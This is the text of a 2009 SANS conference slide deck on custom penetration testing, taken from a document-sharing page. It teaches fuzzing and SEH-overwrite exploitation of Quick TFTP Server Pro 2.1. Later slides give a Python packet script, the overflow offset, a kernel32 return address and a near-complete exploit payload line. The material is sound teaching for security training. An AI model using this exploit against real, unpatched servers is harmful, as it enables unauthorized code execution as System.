+ All Categories
Home > Documents > Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Date post: 08-Feb-2016
Upload: harlen-hutahaean
View: 54 times
Download: 0 times
Share this document with a friend
Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09
Popular Tags:
Advanced Penetration Testing - 2009 SANS 1 Custom Penetration Testing Compromising a Vulnerability through Discovery and Custom Exploitation Stephen Sims
Page 1: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 1

Custom Penetration Testing

Compromising a Vulnerability through Discovery and Custom Exploitation

Stephen Sims

Page 2: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 2


• Penetration Testing• Precompiled Tools• Targeting• TFTP

– Testing a TFTP Server for Bugs– Discovering the Bug– Exploiting the TFTP Server

• Advanced Concepts

Page 3: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 3

What is Penetration Testing?

• Process of testing a target environment for weaknesses– More thorough than vulnerability

scanning alone– Validates findings by exploiting flaws– Allows you to think like an attacker– Various levels of interaction/depth

Page 4: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 4

Types of Penetration Testing

• Black-Box Penetration Testing– No access to source code– No access provided to OS, architecture, etc…– More like an outsider attack scenario

• More time consuming

• Crystal-Box Penetration Testing– Tester given source code, system & network architecture

and/or privileged system access– More thorough than black-box testing– Cost effective

Page 5: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 5

Precompiled Tools

• Pros– Can quickly be used– Customer support– Broad user community– Often allow custom scripts or modules

• Cons– Limited in scope– Only discover and test known vulnerabilities– Skilled attackers are not relying solely on them– Precompiled tools offer a sense of complacency– Do not perform code coverage or do deep fuzzing

Page 6: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 6


• General Steps1. Determine Target Application and

Operating System2. Obtain a Copy of the Application3. Analyze RFC and Communications

Protocols4. Discover and Record a Crash Condition5. Analyze Crash Condition for Exploitation


Page 7: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 7

1) Determine Target Application and Operating System

• What application/service are you analyzing?– What OS’ is it available for?

• Which one(s) are you interested in?

– What services does the application start up?• There may be several• Scanning may help• Analyze documentation and code if possible

– Are the services proprietary or standards-based?• Proprietary often offer a lot of new opportunities

Page 8: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 8

2) Obtain a Copy of the Application

• Create a lab environment and install the application– Use the OS you are targeting– Utilize Virtual Machines

• Create snapshots prior to installation• Install monitoring tools

– Attempt to obtain the source code• Code analysis is often more complex than behavioral

analysis, but valuable

Page 9: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 9

3) Analyze RFC and Communications Protocols

• Is documentation available? – Programmers should follow RFC’s

• Search RFC for potential options and fields that may contain opportunities to cause a fault

• Understand each aspect of the protocols used by the application and relative behavior

– Is architectural documentation available?

Page 10: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 10

4) Discover and Record a Crash Condition

• Are you properly monitoring?– Sniffers to record packets sent to the application

• Wireshark/Tshark, tcpdump, etc…• Packets can be recorded and replayed

– Debuggers to record application behavior while receiving/handling data

• OllyDbg, Immunity Debugger, WinDbg

– OS monitoring tools to monitor health• ProcMon, RegMon, FileMon, RegShot, etc…

– The condition must be repeatable

Page 11: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 11

5) Analyze Crash Condition for Exploitation Opportunities

• What is happening during the crash?– Analyze the status of each register

• Are registers holding or pointing to strange values? e.g. 0x41414141 if inputting A’s

– Is the Return Pointer or SEH chain being overwritten?

• Analyze the stack segment and monitor ESP/EBP

– Are heap pointers being overwritten?• Analyze dynamic memory allocations and behavior

– There’s way more to analyze, but this is a start!

Page 12: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 12

Targeting (2)

• Our goal is to discover and exploit a Windows Program vulnerability!

• The techniques we’ll cover is applicable with any target or service

• We’re targeting a TFTP service– Must understand how the protocol works– Developers should follow RFC’s

• We can leverage the RFC as well

– Could use fuzzing to automate bug discovery

Page 13: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 13

Our TFTP Target

• Quick TFTP Server Pro Version 2.1– Vulnerable to a stack-based buffer

overflow• Can exploit by overwriting the Structured Exception

Handling (SEH) chain• Allows for DoS or code execution as System

– TFTP Server Published by TallSoft– Vulnerability discovered in 2008 by Mati

Aharoni of Offensive Security

Page 14: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 14


• Trivial File Transfer Protocol (TFTP)– Simple protocol for transferring files

over a network– Clear-text protocol using UDP port 69– Used for transferring files by network

devices, VOIP phones and other client-server programs

Page 15: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 15

TFTP Behavior

• Connection request is combined with either a read or write request

• Blocks of data are sent in a fixed 512 byte size– Each block must be acknowledged for error

control• A block less than 512 bytes indicates

the end of the stream

Page 16: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 16

TFTP Behavior (2)

• The first two bytes of a TFTP header indicates the request type and format– \x00\x01 indicates a read request– \x00\x02 indicates a write request– \x00\x03 indicates the data block– \x00\x04 is an acknowledgement– \x00\x05 indicates an error– \x00\x06 is an optional acknowledgement

Page 17: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 17

TFTP Behavior (3)

• Read and Write request format:– \x00\x01 for read | \x00\x02 for write– File Name– Null byte - \x00– Mode – Binary, ASCII or Mail– Null byte - \x00

• Example

Request Type File Name Null Mode Null

Read \x00\x01 file1.txt 0 Octet 0

Page 18: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 18

Hacking Quick TFTP Server

• Quick TFTP Server Version 2.1– Install tftpserver_setup.exe onto a Windows XP

Virtual Machine– Use the TFTP information just covered to help

with the investigation– Attempt to crash the TFTP server while running in

a debugger– Create a custom script to start the testing– Validate findings– Attempt code execution

Page 19: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 19

Tools We Need

• Programming/Scripting Language– Python, Perl, Ruby, C

• Debugger and Disassembler– OllyDbg, Immunity Debugger, IDAPro

• Shellcode– Metasploit, Milw0rm, Custom

• An open mind! – Knowledge of OS controls, Opcodes, Tricks…

Page 20: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 20


• Object-oriented, High-level Programming Language

• Very Intuitive• Very Modular• No Manual Compilation• Plays well with other languages – C, C++,

Jython, IronPython (.NET)• Good Debugging

Page 21: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 21

Tool: OllyDbg

• Software Debugger for Windows– Author: Oleh Yuschuk

• Shareware!• Binary Code Analysis• Register Contents, Procedures, API

Calls, Patching, memory searching and more!

Page 22: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 22

Hacking TFTP Hint #1

• Consider the format of TFTP requests for your script– We covered the order a few slides ago– Read & Write requests are often the easiest to

attack as they have variable fields• They start with \x00\x01 & \x00\x02

– The header format must be correct to trigger a valid response

– Command line scripting not always the best option• You may want to write a script

Page 23: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 23

Hacking TFTP Hint #2

• Where could a buffer overflow condition exist?– Try the request type field, file name

and/or the mode– Don’t forget the nulls to terminate!– Make sure you’re watching the right

thread in OllyDbg• Processes have multiple threads on Windows

Page 24: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 24

Hacking TFTP Hint #3

• The easiest way is to use Python or Perl to open a socket and send your script

import socketimport systarget = ‘IP ADDRESS’ #Enter the right IP hereport = 69 #Port for TFTPs = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)cmd = "A"*10 #Enter the number of A's to senddata = "\x00\x01"+ cmd #Modify this line to format your packets.sendto(data, (target, port))

Page 25: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 25

Quick TFTP Walk-Through

• Start Quick TFTP Server with Olly

• Ignore entry point messages

• Press F9 once loaded

• Click “OK” on the demo pop-up

Page 26: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 26

Quick TFTP Walk-Through (2)

• This may be possible via command line, but…– We need a script!– Don’t forget the formatting of TFTP read

and write requests:

– The overflow is in the mode section!

Request Type File Name Null Mode Null

Read \x00\x01 file1.txt 0 Octet 0

Page 27: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 27

Quick TFTP Walk-Through (3)

• Write a python script that connects to the TFTP server with 1000 A’s

• No Crash in Olly…

Page 28: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 28

Quick TFTP Walk-Through (4)

1060 A’s

Olly has paused

EIP is 41414141


Page 29: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 29

Quick TFTP Walk-Through (5)

• What are we overwriting?

• Lets do some math to see where the overflow is occurring

We overwrote the SEH Chain!

Page 30: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 30

Quick TFTP Walk-Through (6)

• Subtracting 41 A’s should take us to the SEH handler

• Lets give it a try by setting:cmd = "A"*1023+"\xde\xc0\xad\xde"

We control EIP at 1023 bytes!

Page 31: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 31

Quick TFTP Walk-Through (7)

• We now need to find a valid pop/pop/ret instruction– Use the findjmp tool and experiment– 0x77ec9cac is one I chose from

kernel32.dll for XP SP1– Remember that you must compensate for

SafeSEH if hacking XP SP2/SP3– Also remember that not every pop/pop/ret

address will work. You gotta dig…

Page 32: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 32

Quick TFTP Walk-Through (8)

• Finalizing our script…cmd = "A"*1019+"\xeb\x06\x90\x90"+"\xac\x9c\xec\x77"+"\x90"*4+scdata = "\x00\x01" + "blah" + "\x00"+cmd+"\x00“

Our jmp and pointer…

Our NOP’s and shellcode…

Page 33: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 33

Advanced Concepts

• Depending on the OS Version, a number of controls have been added– SafeSEH

• Protects SEH pointers against overwrites– ASLR

• Randomizes locations of libraries and memory segments– DEP

• Prevents code execution on the stack and heap– Security Cookies

• Pushes unique values onto the stack and heap during allocations which are checked upon exit or free

• Every byte in memory is a potential full or partial opcode– As long as the segment is executable

Page 34: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 34

More Information

• Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield http://www.nextgenss.com/papers/defeating-w2k3-stack- protection.pdf

• Preventing the Exploitation of SEH Overwrites by Skape “Matt Miller” http://www.uninformed.org/?v=5&a=2&t=pdf

• SEH Overwrites Simplified v1.01 by Aelphaeis Mangaraehttp://www.milw0rm.com/papers/187

• Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass by Alexander Anisimov http://www.maxpatrol.com/defeating-xpsp2-heap-protection.pdf

• Reliable Windows Heap Exploits by Matt Conover & Oded Horovitz http://www.slideshare.net/amiable_indian/reliable-windows-heap-exploits

• Third Generation Exploitation by Halvar Flake www.blackhat.com/presentations/win-usa- 02/halvarflake-winsec02.ppt

• Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server by David Litchfield http://www.ngssoftware.com/papers/defeating-w2k3-stack- protection.pdf

• Heap Feng Shui in JavaScript” by Alexander Sotirov http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07- sotirov-apr19.pdf

• Understanding Windows Shellcode by Skape http://www.hick.org/code/skape/papers/win32- shellcode.pdf

Page 35: Stephen Sims - Custom Penetration Testing - SANS PenTest Summit09

Advanced Penetration Testing - 2009 SANS 35


• Questions?

SANS SEC709 “Developing Exploits for Penetration

Testers and Security Researchers”[email protected]
